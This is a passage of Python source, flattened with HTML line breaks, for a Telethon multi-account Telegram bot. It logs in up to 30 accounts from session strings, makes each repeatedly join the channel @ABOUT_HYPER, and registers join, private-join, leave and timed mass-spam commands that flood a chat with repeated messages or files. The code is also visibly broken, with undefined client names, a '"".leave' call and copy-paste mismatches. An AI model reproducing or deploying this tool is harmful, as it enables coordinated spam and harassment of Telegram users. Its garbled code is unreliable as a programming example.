shy(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 16 not Found")<br/> session_name = "startup"<br/> shy = TelegramClient(session_name, a, b)<br/> try:<br/> await shy.start()<br/> except Exception as e:<br/> pass<br/> <br/> if seeee:<br/> session_name = str(seeee)<br/> print("String 17 Found")<br/> aan = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 17")<br/> await aan.start()<br/> botme = await aan.get_me()<br/> await aan(functions.channels.JoinChannelRequest(channel=""))<br/> await aan(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await aan(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await aan(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await aan(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 17 not Found")<br/> session_name = "startup"<br/> aan = TelegramClient(session_name, a, b)<br/> try:<br/> await aan.start()<br/> except Exception as e:<br/> pass<br/> <br/> if eieee:<br/> session_name = str(eieee)<br/> print("String 18 Found")<br/> ake = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 18")<br/> await ake.start()<br/> botme = await ake.get_me()<br/> await ake(functions.channels.JoinChannelRequest(channel=""))<br/> await ake(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await ake(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await ake(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await ake(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botid = 
telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 18 not Found")<br/> session_name = "startup"<br/> ake = TelegramClient(session_name, a, b)<br/> try:<br/> await ake.start()<br/> except Exception as e:<br/> pass<br/> <br/> if nieee:<br/> session_name = str(nieee)<br/> print("String 19 Found")<br/> eel = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 19")<br/> await eel.start()<br/> botme = await eel.get_me()<br/> await eel(functions.channels.JoinChannelRequest(channel=""))<br/> await eel(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await eel(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await eel(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await eel(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 19 not Found")<br/> session_name = "startup"<br/> eel = TelegramClient(session_name, a, b)<br/> try:<br/> await idk.start()<br/> except Exception as e:<br/> pass<br/> <br/> if gandu:<br/> session_name = str(gandu)<br/> print("String 20 Found")<br/> khu = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 20")<br/> await khu.start()<br/> botme = await khu.get_me()<br/> await khu(functions.channels.JoinChannelRequest(channel=""))<br/> await khu(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await khu(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await khu(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await khu(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> 
print(e)<br/> pass<br/> else:<br/> print("Session 20 not Found")<br/> session_name = "startup"<br/> khu = TelegramClient(session_name, a, b)<br/> try:<br/> await khu.start()<br/> except Exception as e:<br/> pass<br/> <br/> if ekish:<br/> session_name = str(ekish)<br/> print("String 21 Found")<br/> shi = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 21")<br/> await shi.start()<br/> botme = await shi.get_me()<br/> await shi(functions.channels.JoinChannelRequest(channel=""))<br/> await shi(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await shi(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await shi(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await shi(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 21 not Found")<br/> session_name = "startup"<br/> shi = TelegramClient(session_name, a, b)<br/> try:<br/> await shi.start()<br/> except Exception as e:<br/> pass<br/> <br/> if baish:<br/> session_name = str(baish)<br/> print("String 22 Found")<br/> yaa = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 22")<br/> await yaa.start()<br/> botme = await yaa.get_me()<br/> await yaa(functions.channels.JoinChannelRequest(channel=""))<br/> await yaa(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await yaa(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await yaa(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await yaa(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 22 not Found")<br/> session_name = "startup"<br/> yaa = 
TelegramClient(session_name, a, b)<br/> try:<br/> await yaa.start()<br/> except Exception as e:<br/> pass<br/> <br/> if teish:<br/> session_name = str(teish)<br/> print("String 23 Found")<br/> dav = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 23")<br/> await dav.start()<br/> botme = await dav.get_me()<br/> await dav(functions.channels.JoinChannelRequest(channel=""))<br/> await dav(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await dav(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await dav(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await dav(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 23 not Found")<br/> session_name = "startup"<br/> dav = TelegramClient(session_name, a, b)<br/> try:<br/> await dav.start()<br/> except Exception as e:<br/> pass<br/> <br/> if tfour:<br/> session_name = str(tfour)<br/> print("String 24 Found")<br/> raj = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 24")<br/> await raj.start()<br/> botme = await raj.get_me()<br/> await raj(functions.channels.JoinChannelRequest(channel=""))<br/> await raj(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await raj(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await raj(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await raj(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 24 not Found")<br/> session_name = "startup"<br/> raj = TelegramClient(session_name, a, b)<br/> try:<br/> await raj.start()<br/> except Exception as e:<br/> 
pass<br/> <br/> if tfive:<br/> session_name = str(tfive)<br/> print("String 25 Found")<br/> put = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 25")<br/> await put.start()<br/> botme = await put.get_me()<br/> await put(functions.channels.JoinChannelRequest(channel=""))<br/> await put(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await put(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await put(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await put(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 25 not Found")<br/> session_name = "startup"<br/> put = TelegramClient(session_name, a, b)<br/> try:<br/> await put.start()<br/> except Exception as e:<br/> pass<br/> <br/> if tsix:<br/> session_name = str(tsix)<br/> print("String 26 Found")<br/> eag = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 26")<br/> await eag.start()<br/> botme = await eag.get_me()<br/> await eag(functions.channels.JoinChannelRequest(channel=""))<br/> await eag(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await eag(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await eag(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await eag(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 26 not Found")<br/> session_name = "startup"<br/> eag = TelegramClient(session_name, a, b)<br/> try:<br/> await eag.start()<br/> except Exception as e:<br/> pass<br/> <br/> if tseven:<br/> session_name = str(tseven)<br/> print("String 27 Found")<br/> ydk = 
TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 27")<br/> await gle.start()<br/> await gle(functions.channels.JoinChannelRequest(channel=""))<br/> await gle(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await gle(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await gle(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await gle(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botme = await gle.get_me()<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 27 not Found")<br/> pass<br/> session_name = "startup"<br/> gle = TelegramClient(session_name, a, b)<br/> try:<br/> await gle.start()<br/> except Exception as e:<br/> pass<div></div> if teight:<br/> session_name = str(teight)<br/> print("String 28 Found")<br/> wal = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 28")<br/> await wal.start()<br/> await wal(functions.channels.JoinChannelRequest(channel=""))<br/> await wal(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await wal(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await wal(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await wal(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botme = await wal.get_me()<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 28 not Found")<br/> pass<br/> session_name = "startup"<br/> wal = TelegramClient(session_name, a, b)<br/> try:<br/> await wal.start()<br/> except Exception as e:<br/> pass<div></div> if tnine:<br/> session_name = str(tnine)<br/> print("String 29 Found")<br/> aaa = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up 
The Client 29")<br/> await aaa.start()<br/> await aaa(functions.channels.JoinChannelRequest(channel=""))<br/> await aaa(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await aaa(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await aaa(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await aaa(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botme = await aaa.get_me()<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 29 not Found")<br/> pass<br/> session_name = "startup"<br/> aaa = TelegramClient(session_name, a, b)<br/> try:<br/> await aaa.start()<br/> except Exception as e:<br/> pass<div></div> if thirty:<br/> session_name = str(thirty)<br/> print("String 30 Found")<br/> boy = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 30")<br/> await boy.start()<br/> await boy(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await boy(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await boy(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await boy(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await boy(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botme = await boy.get_me()<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 30 not Found")<br/> pass<br/> session_name = "startup"<br/> boy = TelegramClient(session_name, a, b)<br/> try:<br/> await boy.start()<br/> except Exception as e:<br/> pass<br/> <br/> <br/>loop = asyncio.get_event_loop()<br/>loop.run_until_complete(start_yukki()) <div></div>async def gifspam(e, smex):<br/> try:<br/> await e.client(<br/> functions.messages.SaveGifRequest(<br/> id=types.InputDocument(<br/> 
id=sandy.media.document.id,<br/> access_hash=smex.media.document.access_hash,<br/> file_reference=smex.media.document.file_reference,<br/> ),<br/> unsave=True,<br/> )<br/> )<br/> except Exception as e:<br/> pass<div></div><div></div>@idk.on(events.NewMessage(incoming=True, pattern=r"\*join"))<br/>@ydk.on(events.NewMessage(incoming=True, pattern=r"\*join"))<br/>@wdk.on(events.NewMessage(incoming=True, pattern=r"\*join"))<br/>@hdk.on(events.NewMessage(incoming=True, pattern=r"\*join"))<br/>@sdk.on(events.NewMessage(incoming=True, pattern=r"\*join"))<br/>@adk.on(events.NewMessage(incoming=True, pattern=r"\*join"))<br/>@bdk.on(events.NewMessage(incoming=True, pattern=r"\*join"))<br/>@cdk.on(events.NewMessage(incoming=True, pattern=r"\*join"))<br/>@edk.on(events.NewMessage(incoming=True, pattern=r"\*join"))<br/>@ddk.on(events.NewMessage(incoming=True, pattern=r"\*join")) <br/>@vkk.on(events.NewMessage(incoming=True, pattern=r"\*join")) <br/>@kkk.on(events.NewMessage(incoming=True, pattern=r"\*join")) <br/>@lkk.on(events.NewMessage(incoming=True, pattern=r"\*join")) <br/>@mkk.on(events.NewMessage(incoming=True, pattern=r"\*join")) <br/>@sid.on(events.NewMessage(incoming=True, pattern=r"\*join"))<br/>@shy.on(events.NewMessage(incoming=True, pattern=r"\*join"))<br/>@aan.on(events.NewMessage(incoming=True, pattern=r"\*join"))<br/>@ake.on(events.NewMessage(incoming=True, pattern=r"\*join"))<br/>@eel.on(events.NewMessage(incoming=True, pattern=r"\*join"))<br/>@khu.on(events.NewMessage(incoming=True, pattern=r"\*join"))<br/>@shi.on(events.NewMessage(incoming=True, pattern=r"\*join"))<br/>@yaa.on(events.NewMessage(incoming=True, pattern=r"\*join"))<br/>@dav.on(events.NewMessage(incoming=True, pattern=r"\*join"))<br/>@raj.on(events.NewMessage(incoming=True, pattern=r"\*join"))<br/>@put.on(events.NewMessage(incoming=True, pattern=r"\*join"))<br/>@eag.on(events.NewMessage(incoming=True, pattern=r"\.join"))<br/>@gle.on(events.NewMessage(incoming=True, 
pattern=r"\*join"))<br/>@wal.on(events.NewMessage(incoming=True, pattern=r"\*join"))<br/>@aaa.on(events.NewMessage(incoming=True, pattern=r"\*join"))<br/>@boy.on(events.NewMessage(incoming=True, pattern=r"\*join"))<div></div><br/>async def _(e):<br/> usage = "𝗠𝗼𝗱𝘂𝗹𝗲 𝗡𝗮𝗺𝗲 = 𝗝𝗼𝗶𝗻\n\nCommand:\n\n.join <Public Channel or Group Link/Username>"<br/> if e.sender_id in SMEX_USERS:<br/> yukki = ("".join(e.text.split(maxsplit=1)[1:])).split(" ", 1)<br/> if len(e.text) > 6:<br/> bc = yukki[0]<br/> text = "Joining..."<br/> event = await e.reply(text, parse_mode=None, link_preview=None )<br/> try:<br/> await e.client(functions.channels.JoinChannelRequest(channel=bc))<br/> await event.edit("Succesfully Joined")<br/> except Exception as e:<br/> await event.edit(str(e)) <br/> else:<br/> await e.reply(usage, parse_mode=None, link_preview=None )<br/> <br/>@idk.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@ydk.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@wdk.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@hdk.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@sdk.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@adk.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@bdk.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@cdk.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@edk.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@ddk.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@vkk.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@kkk.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@lkk.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@mkk.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@sid.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@shy.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@aan.on(events.NewMessage(incoming=True, pattern=r"\*pjoin")) 
<br/>@ake.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@eel.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@khu.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@shi.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@yaa.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@dav.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@raj.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@put.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@eag.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@gle.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@wal.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@aaa.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@boy.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<div></div><div></div>async def _(e):<br/> usage = "𝗠𝗼𝗱𝘂𝗹𝗲 𝗡𝗮𝗺𝗲 = 𝗣𝗿𝗶𝘃𝗮𝘁𝗲 𝗝𝗼𝗶𝗻\n\nCommand:\n\n.pjoin <Private Channel or Group's access hash>\n\nExample :\nLink = https://t.me/joinchat/HGYs1wvsPUplMmM1\n\n.pjoin HGYs1wvsPUplMmM1"<br/> if e.sender_id in SMEX_USERS:<br/> yukki = ("".join(e.text.split(maxsplit=1)[1:])).split(" ", 1)<br/> if len(e.text) > 7:<br/> bc = yukki[0]<br/> text = "Joining...."<br/> event = await e.reply(text, parse_mode=None, link_preview=None )<br/> try:<br/> await e.client(ImportChatInviteRequest(bc))<br/> await event.edit("Succesfully Joined")<br/> except Exception as e:<br/> await event.edit(str(e)) <br/> else:<br/> await e.reply(usage, parse_mode=None, link_preview=None )<br/> <br/> <br/>@idk.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@ydk.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@wdk.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@hdk.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@sdk.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@adk.on(events.NewMessage(incoming=True, 
pattern=r"\*leave"))<br/>@bdk.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@cdk.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@edk.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@ddk.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@vkk.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@kkk.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@lkk.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@mkk.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@sid.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@shy.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@aan.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@ake.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@eel.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@khu.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@shi.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@yaa.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@dav.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@raj.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@put.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@eag.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@gle.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@wal.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@aaa.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@boy.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<div></div><br/>async def _(e):<br/> usage = "𝗠𝗼𝗱𝘂𝗹𝗲 𝗡𝗮𝗺𝗲 = 𝗟𝗲𝗮𝘃𝗲\n\nCommand:\n\n.leave <Channel or Chat ID>"<br/> if e.sender_id in SMEX_USERS:<br/> yukki = ("".leave(e.text.split(maxsplit=1)[1:])).split(" ", 1)<br/> if len(e.text) > 7:<br/> bc = yukki[0]<br/> bc = int(bc)<br/> text = "𝐎𝐊 𝐅𝐈𝐍𝐄 𝐌𝐀𝐍 𝐀𝐑𝐊𝐇𝐀𝐌𝐱𝐆𝐎𝐃 𝐁𝐎𝐓 𝐋𝐄𝐀𝐕𝐈𝐍𝐆....."<br/> event = await e.reply(text, parse_mode=None, 
link_preview=None )<br/> try:<br/> await event.client(LeaveChannelRequest(bc))<br/> await event.edit("Succesfully Left")<br/> except Exception as e:<br/> await event.edit(str(e)) <br/> else:<br/> await e.reply(usage, parse_mode=None, link_preview=None )<br/> <br/> <div></div>@idk.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@ydk.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@wdk.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@hdk.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@sdk.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@adk.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@bdk.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@cdk.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@edk.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@ddk.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@vkk.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@kkk.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@lkk.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@mkk.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@sid.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@shy.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@aan.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@ake.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@eel.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@khu.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@shi.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@yaa.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@dav.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@raj.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@put.on(events.NewMessage(incoming=True, 
pattern=r"\*delayspam"))<br/>@eag.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@gle.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@wal.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@aaa.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@boy.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<div></div><br/>async def spam(e):<br/> usage = "𝗠𝗼𝗱𝘂𝗹𝗲 𝗡𝗮𝗺𝗲 = 𝗗𝗲𝗹𝗮𝘆𝗦𝗽𝗮𝗺\n\nCommand:\n\n.delayspam <sleep time> <count> <message to spam>\n\n.delayspam <sleep time> <count> <reply to a message>\n\nCount and Sleeptime must be a integer."<br/> if e.sender_id in SMEX_USERS:<br/> if e.text[0].isalpha() and e.text[0] in ("/", "#", "@", "!"):<br/> return await e.reply(usage, parse_mode=None, link_preview=None )<br/> smex = await e.get_reply_message()<br/> yukki = "".join(e.text.split(maxsplit=1)[1:]).split(" ", 2)<br/> yukkisexy = yukki[1:]<br/> if len(yukkisexy) == 2:<br/> message = str(yukkisexy[1])<br/> counter = int(yukkisexy[0])<br/> sleeptime = float(yukki[0])<br/> for _ in range(counter):<br/> async with e.client.action(e.chat_id, "typing"):<br/> if e.reply_to_msg_id:<br/> await smex.reply(message)<br/> else:<br/> await e.client.send_message(e.chat_id, message)<br/> await asyncio.sleep(sleeptime)<br/> elif e.reply_to_msg_id and smex.media: <br/> counter = int(yukkisexy[0])<br/> sleeptime = float(yukki[0])<br/> for _ in range(counter):<br/> async with e.client.action(e.chat_id, "document"):<br/> smex = await e.client.send_file(e.chat_id, smex, caption=smex.text)<br/> await gifspam(e, smex) <br/> await asyncio.sleep(sleeptime)<br/> elif e.reply_to_msg_id and smex.text:<br/> message = smex.text<br/> counter = int(yukkisexy[0])<br/> sleeptime = float(yukki[0])<br/> for _ in range(counter):<br/> async with e.client.action(e.chat_id, "typing"):<br/> await e.client.send_message(e.chat_id, message)<br/> await asyncio.sleep(sleeptime)<br/> else:<br/> await e.reply(usage, parse_mode=None, link_preview=None 
)<div></div><br/>@idk.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@ydk.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@wdk.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@hdk.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@sdk.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@adk.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@bdk.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@cdk.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@edk.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@ddk.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@vkk.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@kkk.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@lkk.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@mkk.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@sid.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@shy.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@aan.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@ake.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@eel.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@khu.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@shi.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@yaa.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@dav.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@raj.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@put.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@eag.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@gle.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@wal.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@aaa.on(events.NewMessage(incoming=True, 
